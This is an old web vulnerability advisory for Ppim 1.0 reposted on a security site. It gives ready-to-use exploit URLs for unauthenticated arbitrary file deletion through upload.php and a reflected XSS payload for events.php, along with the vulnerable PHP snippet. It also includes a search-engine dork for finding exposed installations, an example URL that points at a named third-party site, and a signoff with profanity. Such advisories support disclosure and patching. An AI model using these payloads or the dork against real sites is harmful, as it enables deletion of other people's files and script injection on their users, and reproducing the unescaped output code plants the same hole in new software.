Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities

2008-10-06 / 2008-10-07
Credit: Djm-sut
Risk: High
Local: No
Remote: Yes
CWE: CWE-22

########################################################## #Author : BeyazKurt #Contact : Djm-sut@Hotmail.Com # #Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ] #Download : http://scripts.ringsworld.com/organizers/ppim.zip # # D0rk : inurl:events.php?listallevents # # File Delete Vulnerability: upload.php # # Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx # Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName # # $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ # # XSS Vulnerability: events.php # #[CODE] # <?php # if (isset($_GET['date'])) # { # $date_id = $_GET['date']; # print "<a href=\"events.php?mode=new&date=$date_id\">New Event</a><br / >"; # } # ?> #[/CODE] # #Exploit : # events.php?mode=new&date=XSS CODE # events.php?mode=new&date="><script>alert('XSS')</script> # ------------------------------- # # INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) # pigs for dedication : : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! # Proud 2 Be ALBANIAN # # MTK : 0 - 5 : FenerBah&#195;e (H) # # Not : Fuck off pala! aq lameri. # Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate. #######################################################

References:

http://xforce.iss.net/xforce/xfdb/44386
http://www.securityfocus.com/bid/30627
http://www.milw0rm.com/exploits/6215
http://secunia.com/advisories/31424


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top